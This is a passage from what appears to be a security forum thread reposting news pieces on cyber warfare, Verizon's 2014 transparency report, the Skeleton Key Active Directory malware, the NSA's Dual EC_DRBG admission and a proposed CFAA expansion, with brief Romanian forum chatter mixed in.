pointed to Russian hackers as prime suspects; the perpetrators were believed to be working directly for the Russian government. Sony Pictures Entertainment (SPE) is another recent case; its networks were infected in a November 2014 incident. According to the FBI, the occurrence resembled past cyber efforts by North Korea. What makes a cyber warfare attack appealing? Mainly the fact that it can come at little or no cost for the perpetrator. An attacker with great technical capabilities can create disruption by using a single computer wherever he or she is located. While the use of conventional weapons requires expensive manufacturing and physical travel to target locations, cyber attacks can be conducted from anywhere. Traditional weapons have a cost that might be prohibitive for many and are hard to transport (or deliver) in secrecy. In other cases, attacks might require the sacrifice of the offenders. Cyber attacks are quick, can be equally destructive and can definitely be inexpensive to execute. According to Amy Chang, research associate at the Center for a New American Security, “Cyber warfare is a great alternative to conventional weapons. […] It is cheaper for and far more accessible to these small nation-states. It allows these countries to pull off attacks without as much risk of getting caught and without the repercussions when they are.” Accountability is hard to prove when cyber weapons are used. By using several proxies or infecting computers indirectly, it is difficult to trace back to a particular malicious hacker or organization on any form of attacks. And even if a culprit is found, it is hard to accuse a nation of a deliberate act of war, especially due to lack of a legal framework. The problem today is that we live in a high-tech world of uncertainty where people are not well trained and equipped for these new threats that can disrupt communications, and network traffic to and from websites and can potentially paralyze Internet service providers (ISPs) at the international level across national borders. So, in the face of constant security threats, there is a need for all to fully understand how to handle cyber security issues and cyber war and how to mitigate risks and minimize the damage, as best as possible if the circumstances arise. Cyberspace and its Security What can be done and who should act in defense of a nation’s cyberspace? The answer may be complicated. Defending cyberspace is not an easy feat, considering the number of interconnected computers, mobile devices and networks. The majority of the systems, including those regulating nations’ critical infrastructures, are interconnected and then vulnerable not only to direct attacks but also to infection by transmission. Ironically, the numerous technological advances might also pose a risk, as cyber terrorists seem to be always a step forward in identifying security vulnerabilities before security experts can patch them. Lack of recognized rules in cyberspace and difficulty to implement boundaries complete the picture. Lacking a real global response to cyber warfare, many countries and organizations are creating structures and task forces to prepare against cyber threats. According to intelligence studies, more than 140 countries have funded cyber weapon development programs. The U.S. is particularly active and created the USCYBERCOM that “plans, coordinates, integrates, synchronizes, and conducts activities to: direct the operations and defense of specified Department of Defense information networks and; prepare to, and when directed, conduct full-spectrum military cyberspace operations in order to enable actions in all domains, ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries.” In 2012, the U.S. Defense Advanced Research Projects Agency (DARPA) invested $110 million in Plan X, a “Cyberspace is now recognized as a critical domain of operations by the U.S. military and its protection is a national security issue. Plan X is a foundational cyberwarfare program to develop platforms for the Department of Defense to plan for, conduct, and assess cyber warfare in a manner similar to kinetic warfare.” The program was included in DARPA’s reported $1.54 billion cyber budget for 2013-2017. Recently, the U.S. Naval Academy also received $120M to build a classified cyber warfare center in 2016. The center will allow midshipmen to work on classified system and acquire cyber warfare skills. Organizations like the European Advanced Cyber Defence Centre (ACDC), the NATO Computer Incident Response Capability (NCIRC) and the Internet Engineering Task Force (IETF), amongst many others, are working on fighting back against organized, international cyber criminals that have used cyberspace as a warfighting domain. However, this may not be enough to avoid terrorism-based cyberwar attacks, so everyone ought to prepare proactively and effectively by securing systems as much as possible. In an Internet-connected world, every end user is at risk, either directly or indirectly. The Internet provides many different ways to attack. Internet-connected systems must be secured on a global scale. With cyberspace being so vast, flexible, and unregulated, all its users are highly vulnerable to dangers from outside threats. Recent cyber attacks highlight the potential threat posed by information warfare tactics and techniques that use computer connectivity and exploit vulnerabilities sometimes caused by users’ inattentiveness or lack of basic cyber security practices. Proper use of intrusion-detection and intrusion-prevention systems (IDS/IPS) and firewalls (a network’s first line of defense against threats) is a basic response. Through real-time analysis of network traffic—i.e., to investigate and contain these security threats—people can detect the majority of the less sophisticated hacking attacks at a user level. Larger companies must be more aware than ever about their network security vulnerabilities and secure their properties with proper Advanced Threat Protection Platforms for endpoint protection and server security. In the case of government-orchestrated cyber attacks, one of the main lines of defense is the creation of a common front against attackers. There is no better time than now to open collaboration and dialogue amongst various industries and government agencies to take action. Attacks against larger, interconnected systems might be more easily disclosed by comparing data and creating common task forces. Detection and prevention alone may not be enough to stop the attackers, each time, but at least it may inhibit future, similar threats. The Internet might be becoming a new weapon for terrorists, so overcoming cyber vulnerability requires multiple different organizations to come forward and stop the launch of cyber threats that can manipulate the physical world while operating without international boundaries. Conclusion Some of the numerous larger-scale cyber attacks can be intuitively considered acts of cyber war. With many countries large and small investing in cyber warfare, it is impossible not to think of the use of “information warfare” as a new form of terrorism. Information warfare goes beyond simply attacking computers and communications networks, as a computer-literate terrorist can wreak havoc causing physical destruction and harm to populations. The Internet can be turned into a weapon used against targets by terrorists hidden in cyberspace to carry out cyber violence and disruption, while being physically located elsewhere. Computer-related crimes, as an extension of terrorist attacks, have the potential of bringing catastrophic side effects. Cyberspace is increasingly becoming a place of risk and danger, vulnerable to hacks and cyber warfare. With today’s civilization dependent on interconnected cyber systems to virtually operate many of the critical systems that make our daily lives easier, it is obvious that cyber warfare can be the choice for many governments and states, especially those that don’t have access to expensive, conventional weapons of mass destruction. So, how do we counteract such attacks? If cyber warfare is considered war, then anti-terrorism defenses must be deployed. First, though, a legal basis for responses to attacks must be defined. A legal definition of cyber war and cyber weapon, a definition agreed upon globally, is necessary to define the perimeters within which nations can operate in cyberspace. It is important to define what to consider cyber espionage, cyber war or an act of simple hacking. Lacking a clear definition and a global cyber etiquette, nations are left with creating their own defense against cyber weapons and cyber espionage. Exploring real-world examples, continuously monitoring the Information Superhighway, and endorsing cyber security awareness, web security and online safety are the tools currently available for an effective international governance of the Internet. Although the United States has not been subjective to real, destructive cyber terrorism as of today, in terms of hostile action or threat, it has identified a number of ways terrorists can use the computer as a tool for hacking or information warfare. As the job of a cyberterrorist has become more difficult to detect, in time, information control may also be critical for successful counter-terrorism and avoidance of infrastructure warfare. Therefore, it is paramount to investigate some common defense mechanisms that can help pinpoint and capture these threats before they affect massive numbers of people and impair activities in a much more pervasive way. References Brecht, D. (2014, December). Are Cyber Threats the New Terrorism Frontier? Cyber Warnings E-Magazine, 28-32. Retrieved from index Clapper, J. R. (2013, March 12). US Intelligence Community Worldwide Threat Assessment Statement for the Record. Retrieved from http://www.odni.gov/files/documents/Intelligence%20Reports/2013%20ATA%20SFR%20for%20SSCI%2012%20Mar%202013.pdf Donohue, B. (2014, December 19). FBI Officially Blames North Korea in Sony Hacks. Retrieved from FBI Officially Blames North Korea in Sony Hacks | Threatpost | The first stop for security news Kostadinov, D. (2012, December 21). Cyberterrorism Defined (as distinct from “Cybercrime”). Retrieved from Cyberterrorism Defined (as distinct from “Cybercrime”) - InfoSec Institute Morello, C. (2014, November 16). State Department shuts down its e-mail system amid concerns about hacking. Retrieved from State Department shuts down its e-mail system amid concerns about hacking - The Washington Post NATO REVIEW. (n.d.). The history of cyber attacks – a timeline. Retrieved from http://www.nato.int/docu/review/2013/cyber/timeline/EN/index.htm Paganini, P. (2013, December 6). Cyber warfare – Why we need to define a model of conflict? Retrieved from http://securityaffairs.co/wordpress/20204/intelligence/cyber-warfare-model-of-conflict.html Storm, D. (2014, December 22). Cyberwarfare: Digital weapons causing physical damage. Retrieved from http://www.computerworld.com/article/2861531/cyberwarfare-digital-weapons-causing-physical-damage.html Suciu, P. (2014, December 21). Why cyber warfare is so attractive to small nations. Retrieved from http://fortune.com/2014/12/21/why-cyber-warfare-is-so-attractive-to-small-nations/ Source

The number of subpoenas, total orders and warrants that the United States government delivered to Verizon all dropped in the second half of 2014, according to the company’s latest transparency report. The giant telecom provider released data on Thursday that showed a decrease in subpoenas of about 10 percent from the first half of last year to the second half. The volume of pen register and trap and trace orders fell by a little less than 10 percent, and the number of warrants served on Verizon by law enforcement also dropped from 14,977 to 13,050. Verizon officials said in the report that the company received between 0-999 National Security Letters during the second half of 2014, the same range it reported for the first half of the year. The government only allows companies to report the number of NSLs they receive in bands of 1,000. The volume of wiretap orders that Verizon receives remained virtually unchanged from 2013 to 2014, falling slightly from 1,496 in all of 2013 to 1,433. In addition to releasing the data on government orders, Verizon officials also said that the company has been working on privacy issues throughout the past year. “While much of our work to protect our customers’ privacy is done behind the scenes, in the past year we took public positions on issues of significance to our customers. We’ve opposed the United States government’s position that it could issue a search warrant to obtain customer emails stored in a Microsoft server in Ireland. We have a particular interest in this issue as we provide cloud computing and data storage services to business customers around the world, including many non-U.S. customers in data centers outside the United States,” said Craig Silliman, executive vice president and general counsel. “Although Verizon has not received any warrants from the U.S. government for our customers’ information stored in our overseas data centers, we filed briefs in courts and worked with Senators on a bill (The LEADS Act) to help defeat this overreach by the U.S. government. We also continue to support legislation that will add privacy protections to the Foreign Intelligence Surveillance Act (FISA) statute, including ending bulk collection of communications data.” In terms of secret orders from the Foreign Intelligence Surveillance Court, Verizon said it received between 0-999 FISA orders in the first half of 2014. Those orders targeted between 3,000-3,999 customer selectors, meaning that Verizon definitely received some non-zero number of FISA orders. The government makes companies wait six months before reporting FISA data, so the numbers from the first half of last year are the most recent information Verizon can publish. Source

Enterprise Active Directory administrators need to be on the lookout for anomalous privileged user activity after the discovery of malware capable of bypassing single-factor authentication on AD that was used as part of a larger cyberespionage campaign against a global company based in London. Hackers already on the company’s network via a remote access Trojan (RAT) deployed what’s being called the Skeleton Key malware used to steal legitimate insider credentials in order to steal company data and exfiltrate it to the outside without raising many red flags. Researchers at Dell SecureWorks would not identify the organization, nor provide any indication on the identity or location of the attackers, other than to say that it was not an “ecrime” operation and some of the documents taken would be of interest to entities on the “Pacific rim.” Skeleton Key purposely lacks persistence, said Dell SecureWorks director of technology Don Smith. It is installed as an in-memory patch on an Active Directory domain controller and will not survive a reboot. Granted, Active Directory domain controllers such as the ones compromised in this attack, are not rebooted all that often. “I don’t think it was a mistake [by the attackers]. The people concerned have the capability of making it persistent,” Smith said. “The lack of persistence characterizes the stealthy nature of this operation. If you make it persistent over a reboot, you have to leave something behind in the registry or elsewhere that will make it restart. This is super stealthy and this minimizes their footprint. They rely on their foothold elsewhere in the network, and jump in every time they need to.” With access to Active Directory, the hackers can secure username-password combinations and use those credentials to remotely carry out the rest of their attack authenticated as legitimate users. In the case of the London firm, they were discovered on the network which used password-only authentication for its webmail and VPN remote access. Once inside, they were able to use credentials stolen from critical servers, admin workstations and domain controllers to drop Skeleton Key anywhere else on the network. Dell SecureWorks posted a number of indicators of compromise and YARA detection signatures in a report published this week. A number of file names were also found associated with Skeleton Key, including one suggesting an older variant of the malware exists, one that was compiled in 2012. Dell SecureWorks also said the attackers, once on the network, upload the malware’s DLL file to an already compromised machine and attempt to access admin shares on the domain controllers using a list of stolen admin credentials. If the credentials don’t work, they deploy password-stealing tools to extract admin passwords from memory of another server, the domain admin’s workstation or the targeted domain controllers, Dell SecureWorks said. With access to the controller, Skeleton Key’s DLL is loaded and the attackers use the PsExec utility to remotely inject the Skeleton Key patch and run the malware’s DLL remotely on the target domain controllers. The attackers then use a NTLM password hash to authenticate as any user. The lack of persistence isn’t the only perceived weakness associated with Skeleton Key. Its deployment caused AD domain controller replication issues in regional offices that required a reboot. The frequent reboots were an indication that the attackers were re-implanting Skeleton Key, Smith said, which along with the presence of PsExec or TaskScheduler are other anomalous privileged user activities to be on the lookout for. “This was from about just collecting passwords. Once they injected the hash, they could then walk up to any machine in the network, give any user name and their password and get in,” Smith said. “The bad guys used remote access to authenticate at will. I think that characterizes this attack as a long-running cyberespionage operation. There is a lot of information in the victim organization they’re looking for, and they want to maintain as low a profile as possible to evade discovery. All the espionage activity is carried out as an ordinary user. The challenge as a defender is the need to look for anomalous user behavior, which isn’t all that simple a task.” Source

In a new article in an academic math journal, the NSA’s director of research says that the agency’s decision not to withdraw its support of the Dual EC_DRBG random number generator after security researchers found weaknesses in it and questioned its provenance was a “regrettable” choice. Michael Wertheimer, the director of researcher at the National Security Agency, wrote in a short piece in Notices, a publication of the American Mathematical Society, that even during the standards development process for Dual EC many years ago, members of the working group focused on the algorithm raised concerns that it could have a backdoor in it. The algorithm was developed in part by the NSA and cryptographers were suspect of it from the beginning. Then, in 2007, well into the life of Dual EC, researchers at Microsoft delivered a talk at a conference that detailed the potential for a backdoor in the algorithm. Still, both the NSA and NIST, which approves technical standards for the United States government, stood by the algorithm. Dual EC was mostly forgotten until late 2013 when allegations emerged that the NSA may have had a secret $10 million contract with RSA Security that prompted the vendor to make Dual EC–which was then known to be weak–the default random number generator in some of its key crypto products. NIST last year removed Dual EC from its guidance on random number generators. “I wrote about it in 2007 and said it was suspect. I didn’t like it back then because it was from the government,” crypto pioneer Bruce Schneier told Threatpost in September 2013. “It was designed so that it could contain a backdoor. Back then I was suspicious, now I’m terrified.” The NSA came under heated criticism for the Dual EC episode, and now one of the agency’s top officials has said it was a mistake for the NSA not to have withdrawn its support for the algorithm after the weaknesses were raised years ago. “With hindsight, NSA should have ceased supporting the dual EC_DRBG algorithm immediately after security researchers discovered the potential for a trapdoor. In truth, I can think of no better way to describe our failure to drop support for the Dual_EC_DRBG algorithm as anything other than regrettable,” Wertheimer wrote in a piece in Notices’ February issue. “The costs to the Defense Department to deploy a new algorithm were not an adequate reason to sustain our support for a questionable algorithm. Indeed, we support NIST’s April 2014 decision to remove the algorithm. Furthermore, we realize that our advocacy for the DUAL_EC_DRBG casts suspicion on the broader body of work NSA has done to promote secure standards. Indeed, some colleagues have extrapolated this single action to allege that NSA has a broader agenda to ‘undermine Internet encryption.'” Wertheimer said that the agency is trying to combat that perception by changing the way that it contributes to standards efforts in order to be more transparent and accountable. “One significant, and correct, change is that all NSA comments will be in writing and published for review. In other words, we will be open and transparent about our cryptographic contributions to standards. In addition, we will publish algorithms before they are considered for standardization to allow more time for public scrutiny,” Wertheimer wrote. “With these measures in place, even those not disposed to trust NSA’s motives can determine for themselves the appropriateness of our submissions, and we will continue to advocate for better security in open-source software, such as Security Enhancements for Linux and Security Enhancements for Android.” Source

Propun ca useri ce abuzeaza de dislike sa fie sanctionati! Se tot joaca aiurea si dau dislike la fiecare post sau sa se scoata functia de dislike! Sau sa nu mai apare Likes / Dislikes cand postezi ceva Join Date Jun 2006 Location /etc/motd Posts 2,010 Mentioned 0 Post(s) Tagged 0 Thread(s) Rep Power 16

@Nytro Dupa ce ti-am dat like la post!

The Obama administration, currently engaged in a war of words with North Korea over the recent hacking of Sony Pictures Entertainment, is calling on Congress to increase prison sentences for hackers and to expand the definition of hacking. During next week's State of the Union address, the president is set to publicly urge increased prison time and other changes to the Computer Fraud and Abuse Act—the statute that was used to prosecute Internet activist Aaron Swartz before he committed suicide in 2013. At issue is the Computer Fraud and Abuse Act (CFAA), passed in 1984 to bolster the government's ability to nab hackers who destroy or disrupt computer functionality or who steal information. In general, the CFAA makes it illegal to "knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value, unless the object of the fraud and the thing obtained consists only of the use of the computer and the value of such use is not more than $5,000 in any 1-year period." Obama said Tuesday, "We want cybercriminals to feel the full force of American justice, because they are doing as much damage—if not more, these days—as folks who are involved in more conventional crime." Among other things, penalties under Obama's plan would increase from a maximum five-year penalty to 10 years for pure hacking acts, like circumventing a technological barrier. What's more, the law would expand the definition of what "exceeds authorized access" means. A hacker would exceed authorization when accessing information "for a purpose that the accesser knows is not authorized by the computer owner." That raised the eyebrows of researchers and scholars alike. That language is "awkward," according to Orin Kerr, a professor and CFAA expert who has defended Lori Drew and Andrew "weev" Auernheimer in CFAA criminal prosecutions. "For example, if your employer has a policy that 'company computers can be accessed only for work-related purposes,' and you access the computer for personal reasons, then you presumably would be accessing the computer for a purpose that you know the employer has not allowed," Kerr said Wednesday. Kerr continued: Kerr said his "biggest concern" surrounds accepted social computing practices, or as he calls it—"norms-based" liability. He said: More broadly, Kerr added, "The expansion of 'exceeding authorized access' would seem to allow lots of prosecutions under a 'you knew the computer owner wouldn't like that' theory. And that strikes me as a dangerous idea, as it focuses on the subjective wishes of the computer owner instead of the individual’s actual conduct." Security expert Robert Graham said Wednesday that the proposal would affect "cybersecurity professionals that protect the Internet. If you cared about things such as 'national security' and 'cyberterrorism,' then this should be your biggest fear. Because of our knowledge, we do innocent things that look to outsiders like 'hacking.' Protecting computers often means attacking them. The more you crack down on hackers, the more of a chilling effect you create in our profession. This creates an open door for nation-state hackers and the real cybercriminals." Source